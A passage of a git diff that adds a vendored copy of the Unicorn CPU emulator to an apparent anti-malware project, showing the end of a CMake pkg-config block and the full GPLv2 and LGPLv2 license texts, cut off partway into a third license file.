engine\n\ +Version: 
${UNICORN_VERSION_MAJOR}.${UNICORN_VERSION_MINOR}.${UNICORN_VERSION_PATCH}\n\ +libdir=${CMAKE_INSTALL_FULL_LIBDIR}\n\ +includedir=${CMAKE_INSTALL_FULL_INCLUDEDIR}\n\ +Libs: -L\$\{libdir\} -lunicorn\n\ +Cflags: -I\$\{includedir\}\n" + ) + install(FILES ${CMAKE_BINARY_DIR}/unicorn.pc DESTINATION ${CMAKE_INSTALL_LIBDIR}/pkgconfig) +endif() diff --git a/ai_anti_malware/unicorn/unicorn-master/COPYING b/ai_anti_malware/unicorn/unicorn-master/COPYING new file mode 100644 index 0000000..00ccfbb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/COPYING @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. 
+ + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. 
The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. 
+ + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. 
+ +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. 
However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. 
+You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. 
If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
diff --git a/ai_anti_malware/unicorn/unicorn-master/COPYING.LGPL2 b/ai_anti_malware/unicorn/unicorn-master/COPYING.LGPL2 new file mode 100644 index 0000000..5bc8fb2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/COPYING.LGPL2 @@ -0,0 +1,481 @@ + GNU LIBRARY GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1991 Free Software Foundation, Inc. + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the library GPL. It is + numbered 2 because it goes with version 2 of the ordinary GPL.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Library General Public License, applies to some +specially designated Free Software Foundation software, and to any +other libraries whose authors decide to use it. You can use it for +your libraries, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if +you distribute copies of the library, or if you modify it. 
+ + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link a program with the library, you must provide +complete object files to the recipients so that they can relink them +with the library, after making changes to the library and recompiling +it. And you must show them these terms so they know their rights. + + Our method of protecting your rights has two steps: (1) copyright +the library, and (2) offer you this license which gives you legal +permission to copy, distribute and/or modify the library. + + Also, for each distributor's protection, we want to make certain +that everyone understands that there is no warranty for this free +library. If the library is modified by someone else and passed on, we +want its recipients to know that what they have is not the original +version, so that any problems introduced by others will not reflect on +the original authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that companies distributing free +software will individually obtain patent licenses, thus in effect +transforming the program into proprietary software. To prevent this, +we have made it clear that any patent must be licensed for everyone's +free use or not licensed at all. + + Most GNU software, including some libraries, is covered by the ordinary +GNU General Public License, which was designed for utility programs. This +license, the GNU Library General Public License, applies to certain +designated libraries. This license is quite different from the ordinary +one; be sure to read it in full, and don't assume that anything in it is +the same as in the ordinary license. 
+ + The reason we have a separate public license for some libraries is that +they blur the distinction we usually make between modifying or adding to a +program and simply using it. Linking a program with a library, without +changing the library, is in some sense simply using the library, and is +analogous to running a utility program or application program. However, in +a textual and legal sense, the linked executable is a combined work, a +derivative of the original library, and the ordinary General Public License +treats it as such. + + Because of this blurred distinction, using the ordinary General +Public License for libraries did not effectively promote software +sharing, because most developers did not use the libraries. We +concluded that weaker conditions might promote sharing better. + + However, unrestricted linking of non-free programs would deprive the +users of those programs of all benefit from the free status of the +libraries themselves. This Library General Public License is intended to +permit developers of non-free programs to use free libraries, while +preserving your freedom as a user of such programs to change the free +libraries that are incorporated in them. (We have not seen how to achieve +this as regards changes in header files, but we have achieved it as regards +changes in the actual functions of the Library.) The hope is that this +will lead to faster development of free libraries. + + The precise terms and conditions for copying, distribution and +modification follow. Pay close attention to the difference between a +"work based on the library" and a "work that uses the library". The +former contains code derived from the library, while the latter only +works together with the library. + + Note that it is possible for a library to be covered by the ordinary +General Public License rather than by this special one. + + GNU LIBRARY GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. 
This License Agreement applies to any software library which +contains a notice placed by the copyright holder or other authorized +party saying it may be distributed under the terms of this Library +General Public License (also called "this License"). Each licensee is +addressed as "you". + + A "library" means a collection of software functions and/or data +prepared so as to be conveniently linked with application programs +(which use some of those functions and data) to form executables. + + The "Library", below, refers to any such software library or work +which has been distributed under these terms. A "work based on the +Library" means either the Library or any derivative work under +copyright law: that is to say, a work containing the Library or a +portion of it, either verbatim or with modifications and/or translated +straightforwardly into another language. (Hereinafter, translation is +included without limitation in the term "modification".) + + "Source code" for a work means the preferred form of the work for +making modifications to it. For a library, complete source code means +all the source code for all modules it contains, plus any associated +interface definition files, plus the scripts used to control compilation +and installation of the library. + + Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running a program using the Library is not restricted, and output from +such a program is covered only if its contents constitute a work based +on the Library (independent of the use of the Library in a tool for +writing it). Whether that is true depends on what the Library does +and what the program that uses the Library does. + + 1. 
You may copy and distribute verbatim copies of the Library's +complete source code as you receive it, in any medium, provided that +you conspicuously and appropriately publish on each copy an +appropriate copyright notice and disclaimer of warranty; keep intact +all the notices that refer to this License and to the absence of any +warranty; and distribute a copy of this License along with the +Library. + + You may charge a fee for the physical act of transferring a copy, +and you may at your option offer warranty protection in exchange for a +fee. + + 2. You may modify your copy or copies of the Library or any portion +of it, thus forming a work based on the Library, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) The modified work must itself be a software library. + + b) You must cause the files modified to carry prominent notices + stating that you changed the files and the date of any change. + + c) You must cause the whole of the work to be licensed at no + charge to all third parties under the terms of this License. + + d) If a facility in the modified Library refers to a function or a + table of data to be supplied by an application program that uses + the facility, other than as an argument passed when the facility + is invoked, then you must make a good faith effort to ensure that, + in the event an application does not supply such function or + table, the facility still operates, and performs whatever part of + its purpose remains meaningful. + + (For example, a function in a library to compute square roots has + a purpose that is entirely well-defined independent of the + application. Therefore, Subsection 2d requires that any + application-supplied function or table used by this function must + be optional: if the application does not supply it, the square + root function must still compute square roots.) 
+ +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Library, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Library, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote +it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Library. + +In addition, mere aggregation of another work not based on the Library +with the Library (or with a work based on the Library) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may opt to apply the terms of the ordinary GNU General Public +License instead of this License to a given copy of the Library. To do +this, you must alter all the notices that refer to this License, so +that they refer to the ordinary GNU General Public License, version 2, +instead of to this License. (If a newer version than version 2 of the +ordinary GNU General Public License has appeared, then you can specify +that version instead if you wish.) Do not make any other change in +these notices. + + Once this change is made in a given copy, it is irreversible for +that copy, so the ordinary GNU General Public License applies to all +subsequent copies and derivative works made from that copy. + + This option is useful when you wish to copy part of the code of +the Library into a program that is not a library. + + 4. 
You may copy and distribute the Library (or a portion or +derivative of it, under Section 2) in object code or executable form +under the terms of Sections 1 and 2 above provided that you accompany +it with the complete corresponding machine-readable source code, which +must be distributed under the terms of Sections 1 and 2 above on a +medium customarily used for software interchange. + + If distribution of object code is made by offering access to copy +from a designated place, then offering equivalent access to copy the +source code from the same place satisfies the requirement to +distribute the source code, even though third parties are not +compelled to copy the source along with the object code. + + 5. A program that contains no derivative of any portion of the +Library, but is designed to work with the Library by being compiled or +linked with it, is called a "work that uses the Library". Such a +work, in isolation, is not a derivative work of the Library, and +therefore falls outside the scope of this License. + + However, linking a "work that uses the Library" with the Library +creates an executable that is a derivative of the Library (because it +contains portions of the Library), rather than a "work that uses the +library". The executable is therefore covered by this License. +Section 6 states terms for distribution of such executables. + + When a "work that uses the Library" uses material from a header file +that is part of the Library, the object code for the work may be a +derivative work of the Library even though the source code is not. +Whether this is true is especially significant if the work can be +linked without the Library, or if the work is itself a library. The +threshold for this to be true is not precisely defined by law. 
+ + If such an object file uses only numerical parameters, data +structure layouts and accessors, and small macros and small inline +functions (ten lines or less in length), then the use of the object +file is unrestricted, regardless of whether it is legally a derivative +work. (Executables containing this object code plus portions of the +Library will still fall under Section 6.) + + Otherwise, if the work is a derivative of the Library, you may +distribute the object code for the work under the terms of Section 6. +Any executables containing that work also fall under Section 6, +whether or not they are linked directly with the Library itself. + + 6. As an exception to the Sections above, you may also compile or +link a "work that uses the Library" with the Library to produce a +work containing portions of the Library, and distribute that work +under terms of your choice, provided that the terms permit +modification of the work for the customer's own use and reverse +engineering for debugging such modifications. + + You must give prominent notice with each copy of the work that the +Library is used in it and that the Library and its use are covered by +this License. You must supply a copy of this License. If the work +during execution displays copyright notices, you must include the +copyright notice for the Library among them, as well as a reference +directing the user to the copy of this License. Also, you must do one +of these things: + + a) Accompany the work with the complete corresponding + machine-readable source code for the Library including whatever + changes were used in the work (which must be distributed under + Sections 1 and 2 above); and, if the work is an executable linked + with the Library, with the complete machine-readable "work that + uses the Library", as object code and/or source code, so that the + user can modify the Library and then relink to produce a modified + executable containing the modified Library. 
(It is understood + that the user who changes the contents of definitions files in the + Library will not necessarily be able to recompile the application + to use the modified definitions.) + + b) Accompany the work with a written offer, valid for at + least three years, to give the same user the materials + specified in Subsection 6a, above, for a charge no more + than the cost of performing this distribution. + + c) If distribution of the work is made by offering access to copy + from a designated place, offer equivalent access to copy the above + specified materials from the same place. + + d) Verify that the user has already received a copy of these + materials or that you have already sent this user a copy. + + For an executable, the required form of the "work that uses the +Library" must include any data and utility programs needed for +reproducing the executable from it. However, as a special exception, +the source code distributed need not include anything that is normally +distributed (in either source or binary form) with the major +components (compiler, kernel, and so on) of the operating system on +which the executable runs, unless that component itself accompanies +the executable. + + It may happen that this requirement contradicts the license +restrictions of other proprietary libraries that do not normally +accompany the operating system. Such a contradiction means you cannot +use both them and the Library together in an executable that you +distribute. + + 7. 
You may place library facilities that are a work based on the +Library side-by-side in a single library together with other library +facilities not covered by this License, and distribute such a combined +library, provided that the separate distribution of the work based on +the Library and of the other library facilities is otherwise +permitted, and provided that you do these two things: + + a) Accompany the combined library with a copy of the same work + based on the Library, uncombined with any other library + facilities. This must be distributed under the terms of the + Sections above. + + b) Give prominent notice with the combined library of the fact + that part of it is a work based on the Library, and explaining + where to find the accompanying uncombined form of the same work. + + 8. You may not copy, modify, sublicense, link with, or distribute +the Library except as expressly provided under this License. Any +attempt otherwise to copy, modify, sublicense, link with, or +distribute the Library is void, and will automatically terminate your +rights under this License. However, parties who have received copies, +or rights, from you under this License will not have their licenses +terminated so long as such parties remain in full compliance. + + 9. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Library or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Library (or any work based on the +Library), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Library or works based on it. + + 10. 
Each time you redistribute the Library (or any work based on the +Library), the recipient automatically receives a license from the +original licensor to copy, distribute, link with or modify the Library +subject to these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 11. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Library at all. For example, if a patent +license would not permit royalty-free redistribution of the Library by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Library. + +If any portion of this section is held invalid or unenforceable under any +particular circumstance, the balance of the section is intended to apply, +and the section as a whole is intended to apply in other circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system which is +implemented by public license practices. 
Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 12. If the distribution and/or use of the Library is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Library under this License may add +an explicit geographical distribution limitation excluding those countries, +so that distribution is permitted only in or among countries not thus +excluded. In such case, this License incorporates the limitation as if +written in the body of this License. + + 13. The Free Software Foundation may publish revised and/or new +versions of the Library General Public License from time to time. +Such new versions will be similar in spirit to the present version, +but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Library +specifies a version number of this License which applies to it and +"any later version", you have the option of following the terms and +conditions either of that version or of any later version published by +the Free Software Foundation. If the Library does not specify a +license version number, you may choose any version ever published by +the Free Software Foundation. + + 14. If you wish to incorporate parts of the Library into other free +programs whose distribution conditions are incompatible with these, +write to the author to ask for permission. For software which is +copyrighted by the Free Software Foundation, write to the Free +Software Foundation; we sometimes make exceptions for this. 
Our +decision will be guided by the two goals of preserving the free status +of all derivatives of our free software and of promoting the sharing +and reuse of software generally. + + NO WARRANTY + + 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO +WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR +OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY +KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE +LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME +THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN +WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY +AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU +FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR +CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING +RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A +FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF +SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH +DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Libraries + + If you develop a new library, and you want it to be of the greatest +possible use to the public, we recommend making it free software that +everyone can redistribute and change. You can do so by permitting +redistribution under these terms (or, alternatively, under the terms of the +ordinary General Public License). + + To apply these terms, attach the following notices to the library. 
It is +safest to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least the +"copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Library General Public + License as published by the Free Software Foundation; either + version 2 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Library General Public License for more details. + + You should have received a copy of the GNU Library General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + +Also add information on how to contact you by electronic and paper mail. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the library, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the + library `Frob' (a library for tweaking knobs) written by James Random Hacker. + + , 1 April 1990 + Ty Coon, President of Vice + +That's all there is to it! diff --git a/ai_anti_malware/unicorn/unicorn-master/COPYING_GLIB b/ai_anti_malware/unicorn/unicorn-master/COPYING_GLIB new file mode 100644 index 0000000..bf50f20 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/COPYING_GLIB @@ -0,0 +1,482 @@ + GNU LIBRARY GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1991 Free Software Foundation, Inc. 
+ 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + +[This is the first released version of the library GPL. It is + numbered 2 because it goes with version 2 of the ordinary GPL.] + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +Licenses are intended to guarantee your freedom to share and change +free software--to make sure the software is free for all its users. + + This license, the Library General Public License, applies to some +specially designated Free Software Foundation software, and to any +other libraries whose authors decide to use it. You can use it for +your libraries, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if +you distribute copies of the library, or if you modify it. + + For example, if you distribute copies of the library, whether gratis +or for a fee, you must give the recipients all the rights that we gave +you. You must make sure that they, too, receive or can get the source +code. If you link a program with the library, you must provide +complete object files to the recipients so that they can relink them +with the library, after making changes to the library and recompiling +it. 
